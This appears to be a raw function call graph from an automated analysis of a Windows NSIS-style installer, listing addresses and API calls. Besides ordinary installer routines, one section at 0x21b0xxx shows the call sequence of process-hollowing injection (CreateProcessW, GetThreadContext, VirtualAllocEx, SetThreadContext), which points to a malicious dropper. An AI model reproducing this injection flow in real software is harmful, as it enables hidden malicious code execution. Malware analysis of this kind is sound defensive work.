4041->4045 4042 404ff3 4051 404ffa GetClientRect GetSystemMetrics SendMessageA SendMessageA 4042->4051 4046 4051c7 4043->4046 4048 4051a0 ShowWindow 4043->4048 4049 40517a 4043->4049 4087 403e6c SendMessageA 4044->4087 4091 403e9e 4045->4091 4046->4045 4052 4051d2 SendMessageA 4046->4052 4055 4051c0 4048->4055 4056 4051b2 4048->4056 4088 403e10 4049->4088 4057 405069 4051->4057 4058 40504d SendMessageA SendMessageA 4051->4058 4054 405199 4052->4054 4059 4051eb CreatePopupMenu 4052->4059 4063 403e10 SendMessageA 4055->4063 4062 404e23 25 API calls 4056->4062 4060 40507c 4057->4060 4061 40506e SendMessageA 4057->4061 4058->4057 4064 405aa7 18 API calls 4059->4064 4083 403e37 4060->4083 4061->4060 4062->4055 4063->4046 4066 4051fb AppendMenuA 4064->4066 4068 405221 4066->4068 4069 40520e GetWindowRect 4066->4069 4067 40508c 4070 405095 ShowWindow 4067->4070 4071 4050c9 GetDlgItem SendMessageA 4067->4071 4072 40522a TrackPopupMenu 4068->4072 4069->4072 4073 4050b8 4070->4073 4074 4050ab ShowWindow 4070->4074 4071->4054 4075 4050f0 SendMessageA SendMessageA 4071->4075 4072->4054 4076 405248 4072->4076 4086 403e6c SendMessageA 4073->4086 4074->4073 4075->4054 4077 405264 SendMessageA 4076->4077 4077->4077 4079 405281 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4077->4079 4080 4052a3 SendMessageA 4079->4080 4080->4080 4081 4052c4 GlobalUnlock SetClipboardData CloseClipboard 4080->4081 4081->4054 4082->4042 4084 405aa7 18 API calls 4083->4084 4085 403e42 SetDlgItemTextA 4084->4085 4085->4067 4086->4071 4087->4043 4089 403e17 4088->4089 4090 403e1d SendMessageA 4088->4090 4089->4090 4090->4045 4092 403eb6 GetWindowLongA 4091->4092 4102 403f3f 4091->4102 4093 403ec7 4092->4093 4092->4102 4094 403ed6 GetSysColor 4093->4094 4095 403ed9 4093->4095 4094->4095 4096 403ee9 SetBkMode 4095->4096 4097 403edf SetTextColor 4095->4097 4098 403f01 GetSysColor 4096->4098 4099 403f07 4096->4099 4097->4096 4098->4099 4100 403f18 4099->4100 4101 403f0e SetBkColor 4099->4101 4100->4102 4103 403f32 CreateBrushIndirect 4100->4103 4104 403f2b DeleteObject 4100->4104 4101->4100 4102->4054 4103->4102 4104->4103 4105 403964 4106 403ab7 4105->4106 4107 40397c 4105->4107 4108 403ac8 GetDlgItem GetDlgItem 4106->4108 4113 403b08 4106->4113 4107->4106 4109 403988 4107->4109 4112 403e37 19 API calls 4108->4112 4110 403993 SetWindowPos 4109->4110 4111 4039a6 4109->4111 4110->4111 4114 4039c3 4111->4114 4115 4039ab ShowWindow 4111->4115 4116 403af2 SetClassLongA 4112->4116 4117 403b62 4113->4117 4122 401389 2 API calls 4113->4122 4119 4039e5 4114->4119 4120 4039cb DestroyWindow 4114->4120 4115->4114 4121 40140b 2 API calls 4116->4121 4118 403e83 SendMessageA 4117->4118 4123 403ab2 4117->4123 4144 403b74 4118->4144 4125 4039ea SetWindowLongA 4119->4125 4126 4039fb 4119->4126 4124 403dc0 4120->4124 4121->4113 4127 403b3a 4122->4127 4124->4123 4133 403df1 ShowWindow 4124->4133 4125->4123 4130 403a72 4126->4130 4131 403a07 GetDlgItem 4126->4131 4127->4117 4132 403b3e SendMessageA 4127->4132 4128 40140b 2 API calls 4128->4144 4129 403dc2 DestroyWindow EndDialog 4129->4124 4136 403e9e 8 API calls 4130->4136 4134 403a37 4131->4134 4135 403a1a SendMessageA IsWindowEnabled 4131->4135 4132->4123 4133->4123 4138 403a44 4134->4138 4139 403a57 4134->4139 4140 403a8b SendMessageA 4134->4140 4148 403a3c 4134->4148 4135->4123 4135->4134 4136->4123 4137 405aa7 18 API calls 4137->4144 4138->4140 4138->4148 4142 403a74 4139->4142 4143 403a5f 4139->4143 4140->4130 4141 403e10 SendMessageA 4141->4130 4146 40140b 2 API calls 4142->4146 4145 40140b 2 API calls 4143->4145 4144->4123 4144->4128 4144->4129 4144->4137 4147 403e37 19 API calls 4144->4147 4149 403e37 19 API calls 4144->4149 4164 403d02 DestroyWindow 4144->4164 4145->4148 4146->4148 4147->4144 4148->4130 4148->4141 4150 403bef GetDlgItem 4149->4150 4151 403c04 4150->4151 4152 403c0c ShowWindow EnableWindow 4150->4152 4151->4152 4173 403e59 EnableWindow 4152->4173 4154 403c36 EnableWindow 4157 403c4a 4154->4157 4155 403c4f GetSystemMenu EnableMenuItem SendMessageA 4156 403c7f SendMessageA 4155->4156 4155->4157 4156->4157 4157->4155 4174 403e6c SendMessageA 4157->4174 4175 405a85 lstrcpynA 4157->4175 4160 403cad lstrlenA 4161 405aa7 18 API calls 4160->4161 4162 403cbe SetWindowTextA 4161->4162 4163 401389 2 API calls 4162->4163 4163->4144 4164->4124 4165 403d1c CreateDialogParamA 4164->4165 4165->4124 4166 403d4f 4165->4166 4167 403e37 19 API calls 4166->4167 4168 403d5a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4167->4168 4169 401389 2 API calls 4168->4169 4170 403da0 4169->4170 4170->4123 4171 403da8 ShowWindow 4170->4171 4172 403e83 SendMessageA 4171->4172 4172->4124 4173->4154 4174->4157 4175->4160 4176 402164 4177 4029e8 18 API calls 4176->4177 4178 40216a 4177->4178 4179 4029e8 18 API calls 4178->4179 4180 402173 4179->4180 4181 4029e8 18 API calls 4180->4181 4182 40217c 4181->4182 4183 405d7c 2 API calls 4182->4183 4184 402185 4183->4184 4185 402196 lstrlenA lstrlenA 4184->4185 4186 402189 4184->4186 4187 404e23 25 API calls 4185->4187 4188 404e23 25 API calls 4186->4188 4190 402191 4186->4190 4189 4021d2 SHFileOperationA 4187->4189 4188->4190 4189->4186 4189->4190 4658 4019e6 4659 4029e8 18 API calls 4658->4659 4660 4019ef ExpandEnvironmentStringsA 4659->4660 4661 401a03 4660->4661 4663 401a16 4660->4663 4662 401a08 lstrcmpA 4661->4662 4661->4663 4662->4663 4664 4021e6 4665 4021ed 4664->4665 4667 402200 4664->4667 4666 405aa7 18 API calls 4665->4666 4668 4021fa 4666->4668 4669 405346 MessageBoxIndirectA 4668->4669 4669->4667 4191 401c6d 4192 4029cb 18 API calls 4191->4192 4193 401c73 IsWindow 4192->4193 4194 4019d6 4193->4194 4677 4025ed 4678 4025f4 4677->4678 4679 40287d 4677->4679 4680 4025fa FindClose 4678->4680 4680->4679 4195 40266e 4196 4029e8 18 API calls 4195->4196 4197 40267c 4196->4197 4198 402692 4197->4198 4199 4029e8 18 API calls 4197->4199 4200 40573d 2 API calls 4198->4200 4199->4198 4201 402698 4200->4201 4221 40575c GetFileAttributesA CreateFileA 4201->4221 4203 4026a5 4204 4026b1 GlobalAlloc 4203->4204 4205 40274e 4203->4205 4208 402745 CloseHandle 4204->4208 4209 4026ca 4204->4209 4206 402756 DeleteFileA 4205->4206 4207 402769 4205->4207 4206->4207 4208->4205 4222 4031da SetFilePointer 4209->4222 4211 4026d0 4212 4031a8 ReadFile 4211->4212 4213 4026d9 GlobalAlloc 4212->4213 4214 4026e9 4213->4214 4215 40271d WriteFile GlobalFree 4213->4215 4216 402f01 47 API calls 4214->4216 4217 402f01 47 API calls 4215->4217 4220 4026f6 4216->4220 4218 402742 4217->4218 4218->4208 4219 402714 GlobalFree 4219->4215 4220->4219 4221->4203 4222->4211 4223 40276f 4224 4029cb 18 API calls 4223->4224 4225 402775 4224->4225 4226 4027b0 4225->4226 4227 402799 4225->4227 4232 40264e 4225->4232 4230 4027c6 4226->4230 4231 4027ba 4226->4231 4228 4027ad 4227->4228 4229 40279e 4227->4229 4238 4059e3 wsprintfA 4228->4238 4237 405a85 lstrcpynA 4229->4237 4234 405aa7 18 API calls 4230->4234 4233 4029cb 18 API calls 4231->4233 4233->4232 4234->4232 4237->4232 4238->4232 4681 4014f0 SetForegroundWindow 4682 40287d 4681->4682 4239 404772 GetDlgItem GetDlgItem 4240 4047c6 7 API calls 4239->4240 4247 4049e3 4239->4247 4241 40486c DeleteObject 4240->4241 4242 40485f SendMessageA 4240->4242 4243 404877 4241->4243 4242->4241 4244 4048ae 4243->4244 4246 405aa7 18 API calls 4243->4246 4248 403e37 19 API calls 4244->4248 4245 404acd 4249 404b7c 4245->4249 4254 4049d6 4245->4254 4258 404b26 SendMessageA 4245->4258 4250 404890 SendMessageA SendMessageA 4246->4250 4247->4245 4273 404a57 4247->4273 4292 4046f2 SendMessageA 4247->4292 4253 4048c2 4248->4253 4251 404b91 4249->4251 4252 404b85 SendMessageA 4249->4252 4250->4243 4260 404ba3 ImageList_Destroy 4251->4260 4261 404baa 4251->4261 4269 404bba 4251->4269 4252->4251 4257 403e37 19 API calls 4253->4257 4259 403e9e 8 API calls 4254->4259 4255 404abf SendMessageA 4255->4245 4274 4048d0 4257->4274 4258->4254 4263 404b3b SendMessageA 4258->4263 4264 404d6c 4259->4264 4260->4261 4265 404bb3 GlobalFree 4261->4265 4261->4269 4262 404d20 4262->4254 4270 404d32 ShowWindow GetDlgItem ShowWindow 4262->4270 4267 404b4e 4263->4267 4265->4269 4266 4049a4 GetWindowLongA SetWindowLongA 4268 4049bd 4266->4268 4280 404b5f SendMessageA 4267->4280 4271 4049c3 ShowWindow 4268->4271 4272 4049db 4268->4272 4269->4262 4279 40140b 2 API calls 4269->4279 4284 404bec 4269->4284 4270->4254 4290 403e6c SendMessageA 4271->4290 4291 403e6c SendMessageA 4272->4291 4273->4245 4273->4255 4274->4266 4275 40499e 4274->4275 4278 40491f SendMessageA 4274->4278 4281 40495b SendMessageA 4274->4281 4282 40496c SendMessageA 4274->4282 4275->4266 4275->4268 4278->4274 4279->4284 4280->4249 4281->4274 4282->4274 4283 404cf6 InvalidateRect 4283->4262 4285 404d0c 4283->4285 4286 404c1a SendMessageA 4284->4286 4289 404c30 4284->4289 4297 404610 4285->4297 4286->4289 4288 404ca4 SendMessageA SendMessageA 4288->4289 4289->4283 4289->4288 4290->4254 4291->4247 4293 404751 SendMessageA 4292->4293 4294 404715 GetMessagePos ScreenToClient SendMessageA 4292->4294 4295 404749 4293->4295 4294->4295 4296 40474e 4294->4296 4295->4273 4296->4293 4298 40462a 4297->4298 4299 405aa7 18 API calls 4298->4299 4300 40465f 4299->4300 4301 405aa7 18 API calls 4300->4301 4302 40466a 4301->4302 4303 405aa7 18 API calls 4302->4303 4304 40469b lstrlenA wsprintfA SetDlgItemTextA 4303->4304 4304->4262 4305 404d73 4306 404d81 4305->4306 4307 404d98 4305->4307 4308 404d87 4306->4308 4323 404e01 4306->4323 4309 404da6 IsWindowVisible 4307->4309 4315 404dbd 4307->4315 4310 403e83 SendMessageA 4308->4310 4312 404db3 4309->4312 4309->4323 4313 404d91 4310->4313 4311 404e07 CallWindowProcA 4311->4313 4314 4046f2 5 API calls 4312->4314 4314->4315 4315->4311 4324 405a85 lstrcpynA 4315->4324 4317 404dec 4325 4059e3 wsprintfA 4317->4325 4319 404df3 4320 40140b 2 API calls 4319->4320 4321 404dfa 4320->4321 4326 405a85 lstrcpynA 4321->4326 4323->4311 4324->4317 4325->4319 4326->4323 4327 404275 4328 4042b3 4327->4328 4329 4042a6 4327->4329 4331 4042bc GetDlgItem 4328->4331 4337 40431f 4328->4337 4388 40532a GetDlgItemTextA 4329->4388 4333 4042d0 4331->4333 4332 4042ad 4335 405ce3 5 API calls 4332->4335 4339 4042e4 SetWindowTextA 4333->4339 4344 40560c 4 API calls 4333->4344 4334 404403 4336 40458f 4334->4336 4390 40532a GetDlgItemTextA 4334->4390 4335->4328 4343 403e9e 8 API calls 4336->4343 4337->4334 4337->4336 4340 405aa7 18 API calls 4337->4340 4342 403e37 19 API calls 4339->4342 4345 404395 SHBrowseForFolderA 4340->4345 4341 40442f 4346 405659 18 API calls 4341->4346 4347 404302 4342->4347 4348 4045a3 4343->4348 4349 4042da 4344->4349 4345->4334 4350 4043ad CoTaskMemFree 4345->4350 4351 404435 4346->4351 4352 403e37 19 API calls 4347->4352 4349->4339 4353 405578 3 API calls 4349->4353 4354 405578 3 API calls 4350->4354 4391 405a85 lstrcpynA 4351->4391 4355 404310 4352->4355 4353->4339 4356 4043ba 4354->4356 4389 403e6c SendMessageA 4355->4389 4359 4043f1 SetDlgItemTextA 4356->4359 4364 405aa7 18 API calls 4356->4364 4359->4334 4360 404318 4362 405da3 3 API calls 4360->4362 4361 40444c 4363 405da3 3 API calls 4361->4363 4362->4337 4371 404454 4363->4371 4365 4043d9 lstrcmpiA 4364->4365 4365->4359 4368 4043ea lstrcatA 4365->4368 4366 40448e 4392 405a85 lstrcpynA 4366->4392 4368->4359 4369 404497 4370 40560c 4 API calls 4369->4370 4372 40449d GetDiskFreeSpaceA 4370->4372 4371->4366 4374 4055bf 2 API calls 4371->4374 4376 4044e1 4371->4376 4375 4044bf MulDiv 4372->4375 4372->4376 4374->4371 4375->4376 4377 40453e 4376->4377 4378 404610 21 API calls 4376->4378 4379 404561 4377->4379 4381 40140b 2 API calls 4377->4381 4380 404530 4378->4380 4393 403e59 EnableWindow 4379->4393 4383 404540 SetDlgItemTextA 4380->4383 4384 404535 4380->4384 4381->4379 4383->4377 4386 404610 21 API calls 4384->4386 4385 40457d 4385->4336 4394 40420a 4385->4394 4386->4377 4388->4332 4389->4360 4390->4341 4391->4361 4392->4369 4393->4385 4395 404218 4394->4395 4396 40421d SendMessageA 4394->4396 4395->4396 4396->4336 4683 4022f5 4684 4022fb 4683->4684 4685 4029e8 18 API calls 4684->4685 4686 40230d 4685->4686 4687 4029e8 18 API calls 4686->4687 4688 402317 RegCreateKeyExA 4687->4688 4689 402341 4688->4689 4690 40287d 4688->4690 4691 402359 4689->4691 4692 4029e8 18 API calls 4689->4692 4694 4029cb 18 API calls 4691->4694 4697 402365 4691->4697 4693 402352 lstrlenA 4692->4693 4693->4691 4694->4697 4695 402380 RegSetValueExA 4696 402396 RegCloseKey 4695->4696 4696->4690 4697->4695 4698 402f01 47 API calls 4697->4698 4698->4695 4700 4027f5 4701 4029cb 18 API calls 4700->4701 4702 4027fb 4701->4702 4703 402809 4702->4703 4704 40282c 4702->4704 4705 40264e 4702->4705 4703->4705 4708 4059e3 wsprintfA 4703->4708 4704->4705 4706 405aa7 18 API calls 4704->4706 4706->4705 4708->4705 4709 4024f8 4710 4029cb 18 API calls 4709->4710 4713 402502 4710->4713 4711 402578 4712 402536 ReadFile 4712->4711 4712->4713 4713->4711 4713->4712 4714 40257a 4713->4714 4715 40258a 4713->4715 4718 4059e3 wsprintfA 4714->4718 4715->4711 4717 4025a0 SetFilePointer 4715->4717 4717->4711 4718->4711 4719 4016fa 4720 4029e8 18 API calls 4719->4720 4721 401701 SearchPathA 4720->4721 4722 40171c 4721->4722 4723 4014fe 4724 401506 4723->4724 4726 401519 4723->4726 4725 4029cb 18 API calls 4724->4725 4725->4726 4397 403f7f 4398 403f95 4397->4398 4406 4040a2 4397->4406 4400 403e37 19 API calls 4398->4400 4399 404111 4401 4041e5 4399->4401 4402 40411b GetDlgItem 4399->4402 4403 403feb 4400->4403 4409 403e9e 8 API calls 4401->4409 4404 404131 4402->4404 4405 4041a3 4402->4405 4408 403e37 19 API calls 4403->4408 4404->4405 4412 404157 6 API calls 4404->4412 4405->4401 4413 4041b5 4405->4413 4406->4399 4406->4401 4407 4040e6 GetDlgItem SendMessageA 4406->4407 4428 403e59 EnableWindow 4407->4428 4411 403ff8 CheckDlgButton 4408->4411 4420 4041e0 4409->4420 4426 403e59 EnableWindow 4411->4426 4412->4405 4416 4041bb SendMessageA 4413->4416 4417 4041cc 4413->4417 4414 40410c 4418 40420a SendMessageA 4414->4418 4416->4417 4417->4420 4421 4041d2 SendMessageA 4417->4421 4418->4399 4419 404016 GetDlgItem 4427 403e6c SendMessageA 4419->4427 4421->4420 4423 40402c SendMessageA 4424 404053 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4423->4424 4425 40404a GetSysColor 4423->4425 4424->4420 4425->4424 4426->4419 4427->4423 4428->4414 4429 401000 4430 401037 BeginPaint GetClientRect 4429->4430 4431 40100c DefWindowProcA 4429->4431 4433 4010f3 4430->4433 4436 401179 4431->4436 4434 401073 CreateBrushIndirect FillRect DeleteObject 4433->4434 4435 4010fc 4433->4435 4434->4433 4437 401102 CreateFontIndirectA 4435->4437 4438 401167 EndPaint 4435->4438 4437->4438 4439 401112 6 API calls 4437->4439 4438->4436 4439->4438 3880 21b07dd 3892 21b06c7 GetPEB 3880->3892 3882 21b0842 3883 21b0977 CreateFileW 3882->3883 3884 21b099e 3883->3884 3885 21b099c 3883->3885 3884->3885 3886 21b09b1 VirtualAlloc 3884->3886 3886->3885 3887 21b09cb ReadFile 3886->3887 3887->3885 3888 21b09e3 FindCloseChangeNotification 3887->3888 3889 21b09f4 3888->3889 3893 21b0d74 3889->3893 3892->3882 3907 21b06c7 GetPEB 3893->3907 3895 21b0dcb 3896 21b0eb6 3895->3896 3898 21b0ec3 3895->3898 3906 21b09ff ExitProcess 3895->3906 3908 21b109c 3896->3908 3898->3906 3929 21b0267 3898->3929 3900 21b0fc9 3901 21b1036 3900->3901 3902 21b0267 11 API calls 3900->3902 3900->3906 3903 21b0267 11 API calls 3901->3903 3902->3900 3904 21b1055 3903->3904 3904->3906 3938 21b01b6 3904->3938 3907->3895 3947 21b06c7 GetPEB 3908->3947 3910 21b10aa 3911 21b11d8 CreateProcessW 3910->3911 3928 21b11b3 3910->3928 3912 21b11ef GetThreadContext 3911->3912 3911->3928 3913 21b1212 ReadProcessMemory 3912->3913 3912->3928 3914 21b1236 3913->3914 3913->3928 3915 21b1269 VirtualAllocEx 3914->3915 3948 21b0368 3914->3948 3916 21b1293 3915->3916 3915->3928 3918 21b0267 11 API calls 3916->3918 3920 21b12a9 3918->3920 3919 21b125d 3919->3915 3919->3928 3921 21b1303 3920->3921 3922 21b0267 11 API calls 3920->3922 3920->3928 3923 21b0267 11 API calls 3921->3923 3922->3920 3924 21b131d 3923->3924 3925 21b1326 SetThreadContext 3924->3925 3924->3928 3926 21b134b 3925->3926 3925->3928 3927 21b01b6 11 API calls 3926->3927 3927->3928 3928->3906 3930 21b0282 3929->3930 3931 21b0706 GetPEB 3930->3931 3932 21b02a3 3931->3932 3933 21b02ab 3932->3933 3934 21b0335 3932->3934 3935 21b0402 10 API calls 3933->3935 3982 21b0180 3934->3982 3937 21b031c 3935->3937 3937->3900 3939 21b01d1 3938->3939 3940 21b0706 GetPEB 3939->3940 3941 21b01f2 3940->3941 3942 21b023c 3941->3942 3943 21b01f6 3941->3943 3985 21b0192 3942->3985 3944 21b0402 10 API calls 3943->3944 3946 21b0231 3944->3946 3946->3906 3947->3910 3949 21b037b 3948->3949 3957 21b0706 GetPEB 3949->3957 3951 21b039c 3952 21b03a0 3951->3952 3953 21b03e6 3951->3953 3959 21b0402 GetPEB 3952->3959 3973 21b01a4 3953->3973 3956 21b03db 3956->3919 3958 21b0729 3957->3958 3958->3951 3960 21b0467 3959->3960 3976 21b0744 GetPEB 3960->3976 3963 21b04ec 3964 21b04fd VirtualAlloc 3963->3964 3969 21b05c2 3963->3969 3965 21b0513 ReadFile 3964->3965 3964->3969 3966 21b0528 VirtualAlloc 3965->3966 3965->3969 3966->3969 3970 21b0549 3966->3970 3967 21b060b 3967->3956 3968 21b0600 VirtualFree 3968->3967 3969->3967 3969->3968 3970->3969 3971 21b05b1 FindCloseChangeNotification 3970->3971 3972 21b05b5 VirtualFree 3970->3972 3971->3972 3972->3969 3974 21b0402 10 API calls 3973->3974 3975 21b01ae 3974->3975 3975->3956 3978 21b0757 3976->3978 3979 21b04db CreateFileW 3978->3979 3980 21b0616 GetPEB 3978->3980 3979->3963 3979->3969 3981 21b0641 3980->3981 3981->3978 3983 21b0402 10 API calls 3982->3983 3984 21b018a 3983->3984 3984->3937 3986 21b0402 10 API calls 3985->3986 3987 21b019c 3986->3987 3987->3946 4440 401b06 4441 401b13 4440->4441 4442 401b57 4440->4442 4445 4021ed 4441->4445 4450 401b2a 4441->4450 4443 401b80 GlobalAlloc 4442->4443 4444 401b5b 4442->4444 4446 405aa7 18 API calls 4443->4446 4458 401b9b 4444->4458 4461 405a85 lstrcpynA 4444->4461 4447 405aa7 18 API calls 4445->4447 4446->4458 4449 4021fa 4447->4449 4453 405346 MessageBoxIndirectA 4449->4453 4459 405a85 lstrcpynA 4450->4459 4451 401b6d GlobalFree 4451->4458 4453->4458 4454 401b39 4460 405a85 lstrcpynA 4454->4460 4456 401b48 4462 405a85 lstrcpynA 4456->4462 4459->4454 4460->4456 4461->4451 4462->4458 4463 402607 4464 40260a 4463->4464 4466 402622 4463->4466 4465 402617 FindNextFileA 4464->4465 4465->4466 4467 402661 4465->4467 4469 405a85 lstrcpynA 4467->4469 4469->4466 3988 401389 3990 401390 3988->3990 3989 4013fe 3990->3989 3991 4013cb MulDiv SendMessageA 3990->3991 3991->3990 4741 401c8a 4742 4029cb 18 API calls 4741->4742 4743 401c91 4742->4743 4744 4029cb 18 API calls 4743->4744 4745 401c99 GetDlgItem 4744->4745 4746 4024aa 4745->4746 4747 40248e 4748 4029e8 18 API calls 4747->4748 4749 402495 4748->4749 4752 40575c GetFileAttributesA CreateFileA 4749->4752 4751 4024a1 4752->4751 4477 402012 4478 4029e8 18 API calls 4477->4478 4479 402019 4478->4479 4480 4029e8 18 API calls 4479->4480 4481 402023 4480->4481 4482 4029e8 18 API calls 4481->4482 4483 40202c 4482->4483 4484 4029e8 18 API calls 4483->4484 4485 402036 4484->4485 4486 4029e8 18 API calls 4485->4486 4488 402040 4486->4488 4487 402054 CoCreateInstance 4490 402129 4487->4490 4493 402073 4487->4493 4488->4487 4489 4029e8 18 API calls 4488->4489 4489->4487 4491 401423 25 API calls 4490->4491 4492 40215b 4490->4492 4491->4492 4493->4490 4494 402108 MultiByteToWideChar 4493->4494 4494->4490 4495 402215 4496 402223 4495->4496 4497 40221d 4495->4497 4499 4029e8 18 API calls 4496->4499 4501 402233 4496->4501 4498 4029e8 18 API calls 4497->4498 4498->4496 4499->4501 4500 402241 4503 4029e8 18 API calls 4500->4503 4501->4500 4502 4029e8 18 API calls 4501->4502 4502->4500 4504 40224a WritePrivateProfileStringA 4503->4504 4753 401e95 4754 4029e8 18 API calls 4753->4754 4755 401e9c 4754->4755 4756 405d7c 2 API calls 4755->4756 4757 401ea2 4756->4757 4759 401eb4 4757->4759 4760 4059e3 wsprintfA 4757->4760 4760->4759 4761 401595 4762 4029e8 18 API calls 4761->4762 4763 40159c SetFileAttributesA 4762->4763 4764 4015ae 4763->4764 4765 401d95 4766 4029cb 18 API calls 4765->4766 4767 401d9b 4766->4767 4768 4029cb 18 API calls 4767->4768 4769 401da4 4768->4769 4770 401db6 EnableWindow 4769->4770 4771 401dab ShowWindow 4769->4771 4772 40287d 4770->4772 4771->4772 4773 401696 4774 4029e8 18 API calls 4773->4774 4775 40169c GetFullPathNameA 4774->4775 4776 4016b3 4775->4776 4782 4016d4 4775->4782 4779 405d7c 2 API calls 4776->4779 4776->4782 4777 4016e8 GetShortPathNameA 4778 40287d 4777->4778 4780 4016c4 4779->4780 4780->4782 4783 405a85 lstrcpynA 4780->4783 4782->4777 4782->4778 4783->4782 4505 402419 4515 402af2 4505->4515 4507 402423 4508 4029cb 18 API calls 4507->4508 4509 40242c 4508->4509 4510 402443 RegEnumKeyA 4509->4510 4511 40244f RegEnumValueA 4509->4511 4512 40264e 4509->4512 4513 402468 RegCloseKey 4510->4513 4511->4512 4511->4513 4513->4512 4516 4029e8 18 API calls 4515->4516 4517 402b0b 4516->4517 4518 402b19 RegOpenKeyExA 4517->4518 4518->4507 4791 402299 4792 4022c9 4791->4792 4793 40229e 4791->4793 4795 4029e8 18 API calls 4792->4795 4794 402af2 19 API calls 4793->4794 4796 4022a5 4794->4796 4797 4022d0 4795->4797 4798 4029e8 18 API calls 4796->4798 4801 4022e6 4796->4801 4802 402a28 RegOpenKeyExA 4797->4802 4799 4022b6 RegDeleteValueA RegCloseKey 4798->4799 4799->4801 4803 402a53 4802->4803 4810 402a9f 4802->4810 4804 402a79 RegEnumKeyA 4803->4804 4805 402a8b RegCloseKey 4803->4805 4806 402ab0 RegCloseKey 4803->4806 4808 402a28 3 API calls 4803->4808 4804->4803 4804->4805 4807 405da3 3 API calls 4805->4807 4806->4810 4809 402a9b 4807->4809 4808->4803 4809->4810 4811 402acb RegDeleteKeyA 4809->4811 4810->4801 4811->4810 4519 401e1b 4520 4029e8 18 API calls 4519->4520 4521 401e21 4520->4521 4522 404e23 25 API calls 4521->4522 4523 401e2b 4522->4523 4524 4052e5 2 API calls 4523->4524 4528 401e31 4524->4528 4525 401e87 CloseHandle 4527 40264e 4525->4527 4526 401e50 WaitForSingleObject 4526->4528 4529 401e5e GetExitCodeProcess 4526->4529 4528->4525 4528->4526 4528->4527 4530 405ddc 2 API calls 4528->4530 4531 401e70 4529->4531 4532 401e79 4529->4532 4530->4526 4534 4059e3 wsprintfA 4531->4534 4532->4525 4534->4532 4535 401d1b GetDC GetDeviceCaps 4536 4029cb 18 API calls 4535->4536 4537 401d37 MulDiv 4536->4537 4538 4029cb 18 API calls 4537->4538 4539 401d4c 4538->4539 4540 405aa7 18 API calls 4539->4540 4541 401d85 CreateFontIndirectA 4540->4541 4542 4024aa 4541->4542 3417 401721 3418 4029e8 18 API calls 3417->3418 3419 401728 3418->3419 3423 40578b 3419->3423 3421 40172f 3422 40578b 2 API calls 3421->3422 3422->3421 3424 405796 GetTickCount GetTempFileNameA 3423->3424 3425 4057c2 3424->3425 3426 4057c6 3424->3426 3425->3424 3425->3426 3426->3421 4812 4023a1 4813 402af2 19 API calls 4812->4813 4814 4023ab 4813->4814 4815 4029e8 18 API calls 4814->4815 4816 4023b4 4815->4816 4817 4023be RegQueryValueExA 4816->4817 4820 40264e 4816->4820 4818 4023e4 RegCloseKey 4817->4818 4819 4023de 4817->4819 4818->4820 4819->4818 4823 4059e3 wsprintfA 4819->4823 4823->4818 4543 401922 4544 4029e8 18 API calls 4543->4544 4545 401929 lstrlenA 4544->4545 4546 4024aa 4545->4546 3566 403225 #17 SetErrorMode OleInitialize 3636 405da3 GetModuleHandleA 3566->3636 3570 403293 GetCommandLineA 3641 405a85 lstrcpynA 3570->3641 3572 4032a5 GetModuleHandleA 3573 4032bc 3572->3573 3574 4055a3 CharNextA 3573->3574 3575 4032d0 CharNextA 3574->3575 3580 4032dd 3575->3580 3576 403346 3577 403359 GetTempPathA 3576->3577 3642 4031f1 3577->3642 3579 40336f 3581 403393 DeleteFileA 3579->3581 3582 403373 GetWindowsDirectoryA lstrcatA 3579->3582 3580->3576 3583 4055a3 CharNextA 3580->3583 3587 403348 3580->3587 3650 402c5b GetTickCount GetModuleFileNameA 3581->3650 3584 4031f1 11 API calls 3582->3584 3583->3580 3586 40338f 3584->3586 3586->3581 3596 40340d 3586->3596 3735 405a85 lstrcpynA 3587->3735 3588 4033a4 3593 4055a3 CharNextA 3588->3593 3588->3596 3624 4033fd 3588->3624 3597 4033bb 3593->3597 3594 403426 3598 405346 MessageBoxIndirectA 3594->3598 3595 40350b 3599 40358e ExitProcess 3595->3599 3602 405da3 3 API calls 3595->3602 3752 4035a6 3596->3752 3603 4033d8 3597->3603 3604 40343c lstrcatA lstrcmpiA 3597->3604 3601 403434 ExitProcess 3598->3601 3605 40351a 3602->3605 3736 405659 3603->3736 3604->3596 3608 403458 CreateDirectoryA SetCurrentDirectoryA 3604->3608 3606 405da3 3 API calls 3605->3606 3609 403523 3606->3609 3611 40347a 3608->3611 3612 40346f 3608->3612 3613 405da3 3 API calls 3609->3613 3760 405a85 lstrcpynA 3611->3760 3759 405a85 lstrcpynA 3612->3759 3616 40352c 3613->3616 3618 40357a ExitWindowsEx 3616->3618 3623 40353a GetCurrentProcess 3616->3623 3618->3599 3622 403587 3618->3622 3619 4033f2 3751 405a85 lstrcpynA 3619->3751 3621 405aa7 18 API calls 3625 4034aa DeleteFileA 3621->3625 3790 40140b 3622->3790 3628 40354a 3623->3628 3680 4035e3 3624->3680 3627 4034b7 CopyFileA 3625->3627 3633 403488 3625->3633 3627->3633 3628->3618 3629 4034ff 3631 4057d3 38 API calls 3629->3631 3631->3596 3632 405aa7 18 API calls 3632->3633 3633->3621 3633->3629 3633->3632 3635 4034eb CloseHandle 3633->3635 3761 4057d3 3633->3761 3787 4052e5 CreateProcessA 3633->3787 3635->3633 3637 405dca GetProcAddress 3636->3637 3638 405dbf LoadLibraryA 3636->3638 3639 403268 SHGetFileInfoA 3637->3639 3638->3637 3638->3639 3640 405a85 lstrcpynA 3639->3640 3640->3570 3641->3572 3643 405ce3 5 API calls 3642->3643 3645 4031fd 3643->3645 3644 403207 3644->3579 3645->3644 3646 405578 3 API calls 3645->3646 3647 40320f CreateDirectoryA 3646->3647 3648 40578b 2 API calls 3647->3648 3649 403223 3648->3649 3649->3579 3793 40575c GetFileAttributesA CreateFileA 3650->3793 3652 402c9e 3679 402cab 3652->3679 3794 405a85 lstrcpynA 3652->3794 3654 402cc1 3795 4055bf lstrlenA 3654->3795 3658 402cd2 GetFileSize 3659 402dd3 3658->3659 3678 402ce9 3658->3678 3660 402bc5 32 API calls 3659->3660 3662 402dda 3660->3662 3661 4031a8 ReadFile 3661->3678 3664 402e16 GlobalAlloc 3662->3664 3662->3679 3800 4031da SetFilePointer 3662->3800 3663 402e6e 3667 402bc5 32 API calls 3663->3667 3666 402e2d 3664->3666 3671 40578b 2 API calls 3666->3671 3667->3679 3668 402df7 3669 4031a8 ReadFile 3668->3669 3672 402e02 3669->3672 3670 402bc5 32 API calls 3670->3678 3673 402e3e CreateFileA 3671->3673 3672->3664 3672->3679 3674 402e78 3673->3674 3673->3679 3801 4031da 